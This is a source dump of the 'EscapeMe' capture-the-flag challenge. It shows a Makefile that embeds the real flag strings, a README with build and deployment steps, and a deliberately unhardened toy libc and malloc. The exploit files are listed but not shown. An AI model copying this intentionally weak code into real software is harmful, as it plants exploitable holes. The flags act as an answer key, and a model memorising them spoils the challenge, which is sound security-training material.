├── .gitignore ├── Makefile ├── README.md ├── bin ├── Makefile ├── libc │ ├── .gitignore │ ├── Makefile │ ├── assert │ │ ├── Makefile │ │ └── assert.c │ ├── export.map │ ├── io │ │ ├── Makefile │ │ ├── read.c │ │ └── write.c │ ├── libio │ │ ├── Makefile │ │ └── ioputs.c │ ├── malloc │ │ ├── Makefile │ │ ├── arena.c │ │ ├── arena.h │ │ ├── malloc.c │ │ └── malloc.h │ ├── misc │ │ ├── Makefile │ │ ├── brk.c │ │ └── mmap.c │ ├── stdio │ │ ├── Makefile │ │ ├── itoa.c │ │ └── printf.c │ ├── stdlib │ │ ├── Makefile │ │ ├── abort.c │ │ ├── atoi.c │ │ └── exit.s │ ├── string │ │ ├── Makefile │ │ ├── mem.c │ │ └── str.c │ ├── syscall.h │ ├── template.mk │ └── test │ │ ├── Makefile │ │ ├── malloc.c │ │ ├── memory.c │ │ ├── print.c │ │ ├── rw.c │ │ └── start.s ├── memo.c └── start.s ├── exploit ├── Makefile ├── exploit.c ├── exploit.py ├── part │ ├── exploit_lv1.c │ ├── exploit_lv2.c │ ├── exploit_lv3.c │ └── exploit_note.py ├── release ├── start.s └── utils │ ├── Makefile │ ├── exit.s │ ├── hypercall.h │ ├── hypercall.s │ ├── io.c │ ├── mmap.c │ ├── puts.c │ ├── string.c │ └── syscall.h ├── kernel ├── .gitignore ├── Makefile ├── bits.h ├── elf │ ├── Makefile │ ├── elf.c │ └── elf.h ├── kernel.c ├── memory │ ├── Makefile │ ├── memory.h │ ├── sysmem.c │ ├── sysmem.h │ ├── usermem.c │ └── usermem.h ├── service │ ├── Makefile │ ├── hypercall.h │ ├── hypercall.s │ ├── switch.h │ ├── switch.s │ └── syscall.c ├── startup.s ├── template.mk └── utils │ ├── Makefile │ ├── misc.h │ └── misc.s ├── kvm ├── .gitignore ├── Makefile ├── bits.h ├── main.c ├── template.mk ├── utils │ ├── Makefile │ ├── debug.c │ ├── debug.h │ ├── module.c │ ├── module.h │ ├── palloc.c │ ├── palloc.h │ ├── translate.c │ └── translate.h └── vm │ ├── Makefile │ ├── kvm_handler.c │ ├── kvm_handler.h │ ├── vm.c │ └── vm.h └── release ├── hashcash.py ├── libc-2.27.so ├── pow.py └── run.sh /.gitignore: -------------------------------------------------------------------------------- 1 | .* 2 | !.git* 3 | 4 | *.txt 5 | 6 | *.swp 7 | 8 | *.elf 9 | *.bin 10 | *.a 11 | *.o 12 | *.d 13 | *.pyc 14 | 15 | core 16 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | OUTDIR := release 2 | 3 | SUB_OBJS := kvm/kvm.elf kernel/kernel.bin bin/memo-static.elf 4 | TARGET := $(addprefix $(OUTDIR)/,$(notdir $(SUB_OBJS))) 5 | FLAG_FILE := flag2.txt flag3-*.txt 6 | FLAG_TARGET := $(addprefix $(OUTDIR)/,$(FLAG_FILE)) 7 | EXPLOIT := exploit/exploit.elf 8 | 9 | ifdef FLAG 10 | CTF_FLAG1 := ${FLAG}{fr33ly_3x3cu73_4ny_5y573m_c4ll} 11 | CTF_FLAG2 := ${FLAG}{ABI_1nc0n51573ncy_l34d5_70_5y573m_d357ruc710n} 12 | CTF_FLAG3 := ${FLAG}{Or1g1n4l_Hyp3rc4ll_15_4_h07b3d_0f_bug5} 13 | FLAG3_NAME := flag3-`echo -n ${CTF_FLAG3} | sha1sum | cut -d' ' -f1`.txt 14 | else 15 | CTF_FLAG1 := XXXXX{11111111111111111111111111111111} 16 | CTF_FLAG2 := XXXXX{22222222222222222222222222222222} 17 | CTF_FLAG3 := XXXXX{33333333333333333333333333333333} 18 | FLAG3_NAME := flag3-sha1_of_flag.txt 19 | endif 20 | 21 | export CTF_FLAG1 22 | 23 | .PHONY: all 24 | all: $(TARGET) $(FLAG_TARGET) 25 | 26 | $(TARGET): $(SUB_OBJS) 27 | cp $^ release 28 | strip -K main -K palloc release/kvm.elf 29 | strip --strip-debug release/memo-static.elf 30 | 31 | $(OUTDIR)/flag2.txt: 32 | echo "Here is second flag : ${CTF_FLAG2}" > $(OUTDIR)/flag2.txt 33 | 34 | $(OUTDIR)/flag3-*.txt: 35 | echo "Here is final flag : ${CTF_FLAG3}" > $(OUTDIR)/$(FLAG3_NAME) 36 | 37 | $(EXPLOIT): kernel/kernel.elf 38 | $(MAKE) -C exploit SYS_HANDLER=0x0`nm $< | grep syscall_handler | cut -d' ' -f1` 39 | 40 | $(SUB_OBJS) kernel/kernel.elf: FORCE 41 | $(MAKE) -C $(dir $@) $(notdir $@) 42 | 43 | 44 | .PHONY: run 45 | run: $(TARGET) $(FLAG_TARGET) 46 | $(OUTDIR)/run.sh 47 | 48 | .PHONY: exploit 49 | exploit: $(TARGET) $(FLAG_TARGET) $(EXPLOIT) 50 | cd exploit && ./exploit.py 51 | 52 | .PHONY: release 53 | release: $(TARGET) $(FLAG_TARGET) 54 | bash -c "cd $(OUTDIR) && tar zcf EscapeMe.tar.gz {*.elf,*.bin,*.so,*.txt,pow.py}" 55 | 56 | .PHONY: clean 57 | clean: 58 | dirname $(SUB_OBJS) | xargs -l $(MAKE) clean -C 59 | $(MAKE) clean -C exploit 60 | $(RM) $(TARGET) $(FLAG_TARGET) $(OUTDIR)/EscapeMe.tar.gz 61 | 62 | FORCE: 63 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # EscapeMe 2 | 3 | ## Environment 4 | 5 | Ubuntu 18.04 6 | 7 | ## Requirement 8 | 9 | - make 10 | - gcc 11 | - nasm 12 | - execstack 13 | 14 | ## Usage 15 | 16 | Build 17 | 18 | $ make 19 | 20 | $ make FLAG=TWCTF # generate real flag 21 | 22 | Run 23 | 24 | $ make run 25 | 26 | $ make 27 | $ ./release/run.sh 28 | 29 | Exploit 30 | 31 | $ make exploit 32 | 33 | $ make 34 | $ cd exploit && ./exploit.py 35 | 36 | Clean 37 | 38 | $ make clean 39 | 40 | ## Attachement 41 | 42 | - pow.py 43 | - kvm.elf 44 | - kernel.bin (including flag1) 45 | - memo-static.elf 46 | - libc-2.27.so 47 | - flag2.txt 48 | - flag3-sha1\_of\_flag.txt 49 | 50 | ## Deployment on CTF Server 51 | 52 | $ ls -al /home/escape/ 53 | drwxr-x--- 2 root escape 4096 Aug 28 11:28 . 54 | drwxr-xr-x 8 root root 4096 Aug 28 10:10 .. 55 | -rw-r----- 1 root escape 75 Aug 28 10:10 flag2.txt 56 | -rw-r----- 1 root escape 67 Aug 28 10:10 flag3-415254a0b8be92e0a976f329ad3331aa6bbea816.txt 57 | -rw-r----- 1 root escape 8514 Aug 28 10:10 hashcash.pyc 58 | -rw-r----- 1 root escape 8544 Aug 28 10:10 kernel.bin 59 | -rwxr-x--- 1 root escape 23336 Aug 28 10:10 kvm.elf 60 | -rwxr-x--- 1 root escape 20176 Aug 28 10:10 memo-static.elf 61 | -rwxr-x--- 1 root escape 1684 Aug 28 11:28 pow.py 62 | -------------------------------------------------------------------------------- /bin/Makefile: -------------------------------------------------------------------------------- 1 | AS := nasm 2 | 3 | SRCS := $(wildcard *.c) 4 | SHARED_TARGET := $(SRCS:.c=-shared.elf) 5 | STATIC_TARGET := $(SRCS:.c=-static.elf) 6 | 7 | CFLAGS := -Wall -fno-stack-protector -fno-PIE -g3 8 | LDFLAGS := -nostdlib -no-pie 9 | 10 | .PHONY: all 11 | all: $(SHARED_TARGET) $(STATIC_TARGET) 12 | 13 | %-shared.elf: %.c start.o libc/libc.so 14 | $(CC) $(CFLAGS) $(LDFLAGS) start.o $< -L./libc -lc -o $@ 15 | execstack -c $@ 16 | 17 | %-static.elf: start.o %.c libc/libc.a 18 | $(CC) $(CFLAGS) $(LDFLAGS) $^ -o $@ 19 | execstack -c $@ 20 | 21 | libc/libc.so libc/libc.a: 22 | $(MAKE) -C libc 23 | 24 | %.o: %.s 25 | $(AS) -f elf64 $^ 26 | 27 | .PHONY: clean 28 | clean: 29 | $(RM) $(SHARED_TARGET) $(STATIC_TARGET) 30 | $(MAKE) clean -C libc 31 | -------------------------------------------------------------------------------- /bin/libc/.gitignore: -------------------------------------------------------------------------------- 1 | .* 2 | !.gitignore 3 | 4 | *.txt 5 | *.swp 6 | 7 | *.so 8 | *.a 9 | *.bin 10 | *.elf 11 | *.o 12 | *.d 13 | -------------------------------------------------------------------------------- /bin/libc/Makefile: -------------------------------------------------------------------------------- 1 | SHARED_TARGET := libc.so 2 | STATIC_TARGET := libc.a 3 | 4 | SUB_OBJS := io/io.a libio/libio.a \ 5 | stdio/stdio.a stdlib/stdlib.a malloc/malloc.a string/string.a \ 6 | assert/assert.a misc/misc.a 7 | EXPORT := export.map 8 | 9 | CFLAGS := -Wall -masm=intel -fno-stack-protector -fPIE -g3 10 | LDFLAGS := -shared -pie -nostdlib -E --version-script=$(EXPORT) 11 | 12 | export CFLAGS 13 | 14 | .PHONY: all 15 | all: $(SHARED_TARGET) $(STATIC_TARGET) 16 | $(MAKE) -C test 17 | 18 | $(SHARED_TARGET): $(SUB_OBJS) 19 | $(LD) $(LDFLAGS) --whole-archive $^ -o $@ 20 | 21 | $(STATIC_TARGET): $(SUB_OBJS) 22 | $(AR) cqT _$@ $^ 23 | echo "create $@\naddlib _$@\nsave\nend" | ar -M 24 | $(RM) _$@ 25 | 26 | $(SUB_OBJS): FORCE 27 | $(MAKE) -C $(dir $@) $(notdir $@) 28 | 29 | .PHONY: clean 30 | clean: 31 | dirname $(SUB_OBJS) | xargs -l $(MAKE) clean -C 32 | $(MAKE) clean -C test 33 | $(RM) $(SHARED_TARGET) $(STATIC_TARGET) 34 | 35 | FORCE: 36 | -------------------------------------------------------------------------------- /bin/libc/assert/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := assert.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/assert/assert.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void __assert_fail (const char *assertion, const char *file, unsigned int line, const char *function){ 4 | //__assert_fail_base (_("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n"), assertion, file, line, function); 5 | abort(); 6 | } 7 | -------------------------------------------------------------------------------- /bin/libc/export.map: -------------------------------------------------------------------------------- 1 | { 2 | global: 3 | read; 4 | write; 5 | puts; 6 | malloc; 7 | calloc; 8 | realloc; 9 | free; 10 | brk; 11 | sbrk; 12 | mmap; 13 | mprotect; 14 | munmap; 15 | abort; 16 | atoi; 17 | itoa; 18 | exit; 19 | memset; 20 | memcpy; 21 | strlen; 22 | strcat; 23 | strncat; 24 | strchr; 25 | strdup; 26 | printf; 27 | sprintf; 28 | local: *; 29 | }; 30 | -------------------------------------------------------------------------------- /bin/libc/io/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := io.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/io/read.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "../syscall.h" 5 | 6 | ssize_t read(int fd, void *buf, size_t count){ 7 | ssize_t n; 8 | 9 | if(!count) 10 | return 0; 11 | 12 | if (fd < 0 || buf == NULL) 13 | return -1; 14 | 15 | syscall(n, NR_read); 16 | 17 | return n; 18 | } 19 | -------------------------------------------------------------------------------- /bin/libc/io/write.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "../syscall.h" 5 | 6 | ssize_t write(int fd, void *buf, size_t count){ 7 | ssize_t n; 8 | 9 | if(!count) 10 | return 0; 11 | 12 | if (fd < 0 || buf == NULL) 13 | return -1; 14 | 15 | syscall(n, NR_write); 16 | 17 | return n; 18 | } 19 | -------------------------------------------------------------------------------- /bin/libc/libio/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := libio.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/libio/ioputs.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int puts(const char *s){ 5 | int n; 6 | 7 | if((n = write(1, s, strlen(s)))) 8 | write(1, "\n", 1); 9 | 10 | return n; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /bin/libc/malloc/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := malloc.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/malloc/arena.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "arena.h" 3 | 4 | extern struct malloc_state main_arena; 5 | 6 | #define mutex_lock(mutex) do { if(__sync_bool_compare_and_swap(mutex, 0, 1)) break; } while (1); 7 | #define mutex_unlock(mutex) (*mutex = 0) 8 | 9 | mstate arena_get(size_t bytes){ 10 | mstate av = &main_arena; 11 | 12 | arena_aquire(av); 13 | return av; 14 | } 15 | 16 | void arena_aquire(mstate av){ 17 | if(av) 18 | mutex_lock(&av->mutex); 19 | } 20 | 21 | void arena_release(mstate av){ 22 | if(av) 23 | mutex_unlock(&av->mutex); 24 | } 25 | -------------------------------------------------------------------------------- /bin/libc/malloc/arena.h: -------------------------------------------------------------------------------- 1 | #ifndef _ARENA_H 2 | #define _ARENA_H 3 | 4 | #include 5 | #include "malloc.h" 6 | 7 | struct heap_info { 8 | mstate ar_ptr; 9 | size_t size; 10 | }; 11 | typedef struct heap_info* hinfo; 12 | 13 | mstate arena_get(size_t bytes); 14 | void arena_aquire(mstate ar); 15 | void arena_release(mstate ar); 16 | 17 | #endif 18 | -------------------------------------------------------------------------------- /bin/libc/malloc/malloc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "malloc.h" 10 | #include "arena.h" 11 | 12 | #define PAGESIZE (0x1000) 13 | #define ALIGN_DOWN(base, size) ((base) & -((__typeof__ (base)) (size))) 14 | #define ALIGN_UP(base, size) ALIGN_DOWN ((base) + (size) - 1, (size)) 15 | 16 | #define HEAP_MIN_SIZE (32 * 1024) 17 | #define HEAP_MAX_SIZE (1024 * 1024) 18 | #define DEFAULT_MMAP_THRESHOLD (128 * 1024) 19 | 20 | #define PREV_INUSE_BIT (0x1) 21 | #define PREV_INUSE(p) ((p)->size & PREV_INUSE_BIT) 22 | #define INUSE_AT_OFFSET(p, s) PREV_INUSE((mchunkptr)((void*)(p) + (s))) 23 | #define SET_INUSE_AT_OFFSET(p, s) ((mchunkptr)((void*)(p) + (s)))->size |= PREV_INUSE_BIT 24 | #define CLEAR_INUSE_AT_OFFSET(p, s) ((mchunkptr)((void*)(p) + (s)))->size &= ~(PREV_INUSE_BIT) 25 | #define INUSE(p) INUSE_AT_OFFSET((p), chunksize(p)) 26 | #define SET_INUSE(p) SET_INUSE_AT_OFFSET((p), chunksize(p)) 27 | #define CLEAR_INUSE(p) CLEAR_INUSE_AT_OFFSET((p), chunksize(p)) 28 | 29 | #define IS_MMAPPED_BIT (0x2) 30 | #define IS_MMAPPED(p) ((p)->size & IS_MMAPPED_BIT) 31 | 32 | #define NON_MAIN_ARENA_BIT (0x4) 33 | #define NON_MAIN_ARENA(p) ((p)->size & NON_MAIN_ARENA_BIT) 34 | #define SET_NON_MAIN_ARENA(p) ((p)->size |= NON_MAIN_ARENA_BIT) 35 | 36 | #define SIZE_BITS (PREV_INUSE_BIT | IS_MMAPPED_BIT | NON_MAIN_ARENA_BIT) 37 | #define CHUNK_SIZE(p) (CHUNK_SIZE_NOMASK(p) & ~(SIZE_BITS)) 38 | #define CHUNK_SIZE_NOMASK(p) ((p)->size) 39 | #define PREV_SIZE(p) ((p)->prev_size) 40 | #define SET_HEAD_SIZE(p, s) ((p)->size = (((p)->size & SIZE_BITS) | (s))) 41 | #define SET_HEAD(p, s) ((p)->size = (s)) 42 | #define SET_PREV_SIZE(p, sz) ((p)->prev_size = (sz)) 43 | #define SET_FOOT(p, s) (CHUNK_AT_OFFSET((p),(s))->prev_size = (s)) 44 | 45 | #define NEXT_CHUNK(p) ((mchunkptr)((void*)(p) + CHUNK_SIZE(p))) 46 | #define PREV_CHUNK(p) ((mchunkptr)((void*)(p) - PREV_SIZE(p))) 47 | #define CHUNK_AT_OFFSET(p, s) ((mchunkptr)((void*)(p) + (s))) 48 | 49 | #define CHUNK2MEM(p) ((void*)(p) + SIZE_SZ*2) 50 | #define MEM2CHUNK(mem) ((mchunkptr)((void*)(mem) - SIZE_SZ*2)) 51 | 52 | #define BIN_AT(m, i) ((mbinptr)((void*)&((m)->bins[((i)-1) * 2]) - offsetof(struct malloc_chunk, fd))) 53 | #define UNSORTED_CHUNKS(M) (BIN_AT(M, 1)) 54 | #define INITIAL_TOP(M) (UNSORTED_CHUNKS(M)) 55 | 56 | #define IN_SMALLBIN_RANGE(sz) ((sz) < MIN_LARGE_SIZE) 57 | 58 | #define FIRST(b) ((b)->fd) 59 | #define LAST(b) ((b)->bk) 60 | 61 | #define LINK(p, fwd, bck) \ 62 | do { \ 63 | (p)->fd = (fwd); \ 64 | (p)->bk = (bck); \ 65 | (bck)->fd = (fwd)->bk = (p); \ 66 | } while(0); 67 | 68 | #define NONCONTIGUOUS_BIT (2U) 69 | #define CONTIGUOUS(M) (!((M)->flags & NONCONTIGUOUS_BIT)) 70 | #define SET_NONCONTIGUOUS(M) ((M)->flags |= NONCONTIGUOUS_BIT) 71 | #define SET_CONTIGUOUS(M) ((M)->flags &= ~NONCONTIGUOUS_BIT) 72 | 73 | #define HEAP_FOR_PTR(ptr) ((hinfo) ((uint64_t) (ptr) & ~(HEAP_MAX_SIZE - 1))) 74 | #define ARENA_FOR_CHUNK(ptr) (NON_MAIN_ARENA(ptr) ? HEAP_FOR_PTR(ptr)->ar_ptr : &main_arena) 75 | 76 | struct malloc_state main_arena; 77 | static struct malloc_par mp = { 78 | .mmap_threshold = DEFAULT_MMAP_THRESHOLD 79 | }; 80 | 81 | static void *_int_malloc(mstate av, size_t bytes); 82 | static void _int_free(mstate av, mchunkptr p); 83 | static void *_int_realloc(mstate av, mchunkptr oldp, size_t oldsize, size_t nb); 84 | static void malloc_init_state(mstate av); 85 | static void *sysmalloc(mstate av, size_t nb); 86 | static void _alloc_split(mstate av, mchunkptr p, size_t nb); 87 | static void *_alloc_top(mstate av, size_t nb); 88 | static void link_bins(mstate av, mchunkptr p); 89 | static void unlink_freelist(mchunkptr p); 90 | static void munmap_chunk(mchunkptr p); 91 | 92 | void *malloc(size_t bytes) { 93 | mchunkptr victim; 94 | mstate ar_ptr; 95 | void *mem; 96 | 97 | ar_ptr = arena_get(bytes); 98 | mem = _int_malloc(ar_ptr, bytes); 99 | arena_release(ar_ptr); 100 | 101 | if(!mem) 102 | return NULL; 103 | 104 | victim = MEM2CHUNK(mem); 105 | assert(IS_MMAPPED(victim) || ar_ptr == ARENA_FOR_CHUNK(victim)); 106 | 107 | return mem; 108 | } 109 | 110 | void free(void *mem) { 111 | mchunkptr p; 112 | mstate ar_ptr; 113 | 114 | if(!mem) 115 | return; 116 | 117 | p = MEM2CHUNK(mem); 118 | 119 | if(IS_MMAPPED(p)){ 120 | munmap_chunk(p); 121 | return; 122 | } 123 | 124 | ar_ptr = ARENA_FOR_CHUNK(p); 125 | arena_aquire(ar_ptr); 126 | _int_free(ar_ptr, p); 127 | arena_release(ar_ptr); 128 | } 129 | 130 | void *realloc(void *oldmem, size_t bytes){ 131 | mstate ar_ptr; 132 | mchunkptr oldp; 133 | size_t oldsize, nb; 134 | void *newmem; 135 | 136 | if(!oldmem) 137 | return malloc(bytes); 138 | 139 | oldp = MEM2CHUNK(oldmem); 140 | oldsize = CHUNK_SIZE(oldp); 141 | 142 | nb = REQUEST2SIZE(bytes); 143 | 144 | if(IS_MMAPPED(oldp)){ 145 | if(oldsize - SIZE_SZ >= nb) 146 | return oldmem; 147 | 148 | newmem = malloc(bytes); 149 | if(!newmem) 150 | return NULL; 151 | 152 | memcpy(newmem, oldmem, oldsize - SIZE_SZ); 153 | munmap_chunk(oldp); 154 | 155 | return newmem; 156 | } 157 | 158 | ar_ptr = arena_get(bytes); 159 | newmem = _int_realloc(ar_ptr, oldp, oldsize, nb); 160 | arena_release(ar_ptr); 161 | 162 | #ifdef DEBUG 163 | printf("realloc : %p\n", newmem); 164 | #endif 165 | return newmem; 166 | } 167 | 168 | void *calloc(size_t n, size_t elem_size){ 169 | size_t bytes; 170 | mchunkptr victim; 171 | mstate ar_ptr; 172 | void *mem; 173 | 174 | bytes = n * elem_size; 175 | ar_ptr = arena_get(bytes); 176 | mem = _int_malloc(ar_ptr, bytes); 177 | arena_release(ar_ptr); 178 | 179 | if(!mem) 180 | return NULL; 181 | 182 | victim = MEM2CHUNK(mem); 183 | assert(IS_MMAPPED(victim) || ar_ptr == ARENA_FOR_CHUNK(victim)); 184 | 185 | #ifdef DEBUG 186 | printf("calloc : %p\n", mem); 187 | #endif 188 | memset(mem, 0, bytes); 189 | return mem; 190 | } 191 | 192 | static void *_int_malloc(mstate av, size_t bytes){ 193 | mchunkptr victim; 194 | void *mem; 195 | 196 | size_t size, nb; 197 | unsigned idx; 198 | mbinptr bin; 199 | 200 | nb = REQUEST2SIZE(bytes); 201 | 202 | if(av && !av->top) 203 | malloc_init_state(av); 204 | 205 | if(IN_SMALLBIN_RANGE(nb)){ 206 | idx = SMALLBIN_INDEX(nb); 207 | bin = BIN_AT(av, idx); 208 | 209 | if((victim = LAST(bin)) && victim != bin){ 210 | unlink_freelist(victim); 211 | 212 | SET_INUSE_AT_OFFSET(victim, nb); 213 | goto alloc_complete; 214 | } 215 | idx++; 216 | } 217 | else 218 | idx = LARGEBIN_INDEX(nb); 219 | 220 | while((victim = UNSORTED_CHUNKS(av)->bk) != UNSORTED_CHUNKS(av)){ 221 | unlink_freelist(victim); 222 | 223 | size = CHUNK_SIZE(victim); 224 | if(size == nb){ 225 | SET_INUSE_AT_OFFSET(victim, size); 226 | goto alloc_complete; 227 | } 228 | 229 | link_bins(av, victim); 230 | } 231 | 232 | if(!IN_SMALLBIN_RANGE(nb)){ 233 | bin = BIN_AT(av, idx); 234 | 235 | if((victim = FIRST(bin)) == bin || CHUNK_SIZE(victim) < nb) 236 | goto next_bin; 237 | 238 | do { 239 | victim = victim->bk_nextsize; 240 | } while((size = CHUNK_SIZE(victim)) < nb); 241 | 242 | if(victim != LAST(bin) && CHUNK_SIZE_NOMASK(victim) == CHUNK_SIZE_NOMASK(victim->fd)) 243 | victim = victim->fd; 244 | 245 | unlink_freelist(victim); 246 | _alloc_split(av, victim, nb); 247 | 248 | goto alloc_complete; 249 | } 250 | 251 | next_bin: 252 | for(; idx= NSMALLBINS){ 259 | if(CHUNK_SIZE(victim) < nb) 260 | continue; 261 | 262 | do { 263 | victim = victim->bk_nextsize; 264 | } while((size = CHUNK_SIZE(victim)) < nb); 265 | 266 | if(victim != LAST(bin) && CHUNK_SIZE_NOMASK(victim) == CHUNK_SIZE_NOMASK(victim->fd)) 267 | victim = victim->fd; 268 | } 269 | 270 | unlink_freelist(victim); 271 | _alloc_split(av, victim, nb); 272 | 273 | goto alloc_complete; 274 | } 275 | 276 | if(!(victim = _alloc_top(av, nb))) 277 | victim = sysmalloc(av, nb); 278 | 279 | alloc_complete: 280 | if(av != &main_arena) 281 | SET_NON_MAIN_ARENA(victim); 282 | 283 | #ifdef DEBUG 284 | printf("_int_malloc(0x%0x) : %p\n", nb, victim); 285 | #endif 286 | 287 | mem = CHUNK2MEM(victim); 288 | return mem; 289 | } 290 | 291 | static void _int_free(mstate av, mchunkptr p){ 292 | mchunkptr nextchunk; 293 | size_t size, prevsize, nextsize; 294 | 295 | size = CHUNK_SIZE(p); 296 | nextchunk = CHUNK_AT_OFFSET(p, size); 297 | nextsize = CHUNK_SIZE(nextchunk); 298 | 299 | #ifdef DEBUG 300 | printf("_int_free(0x%0x) : %p\n", size, p); 301 | #endif 302 | 303 | if(!PREV_INUSE(nextchunk)){ 304 | abort(); 305 | } 306 | 307 | if(!PREV_INUSE(p)){ 308 | prevsize = PREV_SIZE(p); 309 | size += prevsize; 310 | p = CHUNK_AT_OFFSET(p, -prevsize); 311 | unlink_freelist(p); 312 | } 313 | 314 | if(nextchunk == av->top){ 315 | size += nextsize; 316 | SET_HEAD(p, size | PREV_INUSE_BIT); 317 | av->top = p; 318 | } 319 | else{ 320 | mchunkptr fwd, bck; 321 | 322 | if(INUSE_AT_OFFSET(nextchunk, nextsize)) 323 | CLEAR_INUSE_AT_OFFSET(nextchunk, 0); 324 | else{ 325 | unlink_freelist(nextchunk); 326 | size += nextsize; 327 | } 328 | 329 | SET_HEAD(p, size | PREV_INUSE_BIT); 330 | SET_FOOT(p, size); 331 | 332 | if(!IN_SMALLBIN_RANGE(size)) 333 | p->fd_nextsize = p->bk_nextsize = NULL; 334 | 335 | bck = UNSORTED_CHUNKS(av); 336 | fwd = bck->fd; 337 | #ifdef DEBUG 338 | printf("[%s]link : %p\n", __func__, p); 339 | #endif 340 | LINK(p, fwd, bck); 341 | } 342 | } 343 | 344 | static void *_int_realloc(mstate av, mchunkptr oldp, size_t oldsize, size_t nb){ 345 | mchunkptr newp, nextchunk; 346 | size_t nextsize; 347 | 348 | assert(oldp && CHUNK_SIZE(oldp) >= MINSIZE && oldsize < av->system_mem); 349 | 350 | nextchunk = CHUNK_AT_OFFSET(oldp, oldsize); 351 | nextsize = CHUNK_SIZE(nextchunk); 352 | newp = NULL; 353 | 354 | if(oldsize >= nb) 355 | newp = oldp; 356 | else if(nextchunk == av->top){ 357 | if(oldsize + nextsize < nb + MINSIZE) 358 | goto newalloc; 359 | if(!_alloc_top(av, nb - oldsize)) 360 | goto newalloc; 361 | 362 | newp = oldp; 363 | SET_HEAD_SIZE(newp, nb); 364 | } 365 | else if(!INUSE_AT_OFFSET(nextchunk, nextsize)){ 366 | size_t newsize; 367 | 368 | if((newsize = oldsize + nextsize) < nb) 369 | goto newalloc; 370 | 371 | newp = oldp; 372 | unlink_freelist(nextchunk); 373 | SET_HEAD_SIZE(newp, newsize); 374 | } 375 | 376 | if(newp){ 377 | _alloc_split(av, newp, nb); 378 | return CHUNK2MEM(newp); 379 | } 380 | 381 | newalloc: 382 | do{ 383 | void *newmem; 384 | 385 | newmem = _int_malloc(av, nb - MALLOC_ALIGN_MASK); 386 | if(!newmem) 387 | return NULL; 388 | 389 | assert(oldsize < nb); 390 | memcpy(newmem, CHUNK2MEM(oldp), oldsize - SIZE_SZ); 391 | _int_free(av, oldp); 392 | 393 | return newmem; 394 | } while(0); 395 | } 396 | 397 | static void malloc_init_state(mstate av){ 398 | int i; 399 | mbinptr bin; 400 | 401 | for(i=1; ifd = bin->bk = bin; 404 | } 405 | 406 | SET_NONCONTIGUOUS(av); 407 | av->top = INITIAL_TOP(av); 408 | } 409 | 410 | static void *sysmalloc(mstate av, size_t nb){ 411 | mchunkptr old_top; 412 | size_t old_size; 413 | void *old_end; 414 | 415 | size_t size; 416 | void *brk; 417 | mchunkptr p; 418 | 419 | if(!av || nb > mp.mmap_threshold){ 420 | void *mm; 421 | int64_t correction; 422 | size_t front_misalign; 423 | 424 | size = ALIGN_UP(nb + MINSIZE, PAGESIZE); 425 | if(size < nb) 426 | goto try_brk; 427 | 428 | mm = mmap(0, size, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); 429 | if(mm == MAP_FAILED) 430 | goto try_brk; 431 | 432 | front_misalign = (size_t)CHUNK2MEM(mm) & MALLOC_ALIGN_MASK; 433 | correction = front_misalign ? MALLOC_ALIGNMENT - front_misalign : 0; 434 | 435 | p = (mchunkptr)(mm + correction); 436 | SET_PREV_SIZE(p, correction); 437 | SET_HEAD(p, (size - correction) | IS_MMAPPED_BIT); 438 | 439 | //check_chunk(av, p); 440 | return p; 441 | } 442 | 443 | try_brk: 444 | if(!av) 445 | return NULL; 446 | 447 | old_top = av->top; 448 | old_size = CHUNK_SIZE(old_top); 449 | old_end = (void*)(CHUNK_AT_OFFSET(old_top, old_size)); 450 | brk = (void*) -1; 451 | 452 | assert(old_size < nb + MINSIZE); 453 | 454 | if(av == &main_arena){ 455 | size = nb + MINSIZE; 456 | 457 | if(CONTIGUOUS(av)) 458 | size -= old_size; 459 | size = ALIGN_UP(size, PAGESIZE); 460 | 461 | if(size > 0) 462 | brk = sbrk(size); 463 | if(brk == (void*)-1) 464 | return NULL; 465 | 466 | av->system_mem += size; 467 | 468 | if(brk == old_end) 469 | SET_HEAD(old_top, (size + old_size) | PREV_INUSE_BIT); 470 | else{ 471 | int64_t correction; 472 | void *snd_brk, *aligned_brk; 473 | size_t front_misalign, end_misalign; 474 | 475 | snd_brk = (void*)-1; 476 | aligned_brk = brk; 477 | 478 | if(CONTIGUOUS(av)){ 479 | if(old_size) 480 | av->system_mem += brk - old_end; 481 | 482 | front_misalign = (size_t)CHUNK2MEM(brk) & MALLOC_ALIGN_MASK; 483 | if(front_misalign){ 484 | correction = MALLOC_ALIGNMENT - front_misalign; 485 | aligned_brk += correction; 486 | } 487 | else 488 | correction = 0; 489 | 490 | correction += old_size; 491 | end_misalign = (size_t)(brk + size + correction); 492 | correction += (ALIGN_UP (end_misalign, PAGESIZE)) - end_misalign; 493 | 494 | snd_brk = sbrk(correction); 495 | } 496 | else{ 497 | front_misalign = (size_t)CHUNK2MEM(brk) & MALLOC_ALIGN_MASK; 498 | if(front_misalign) 499 | aligned_brk += MALLOC_ALIGNMENT - front_misalign; 500 | } 501 | 502 | if(snd_brk == (void*)-1){ 503 | correction = 0; 504 | snd_brk = sbrk(0); 505 | } 506 | 507 | av->top = (mchunkptr)aligned_brk; 508 | SET_HEAD(av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE_BIT); 509 | av->system_mem += correction; 510 | } 511 | } 512 | else{ 513 | // TODO 514 | } 515 | 516 | p = _alloc_top(av, nb); 517 | 518 | //check_chunk(av, p); 519 | return p; 520 | } 521 | 522 | static 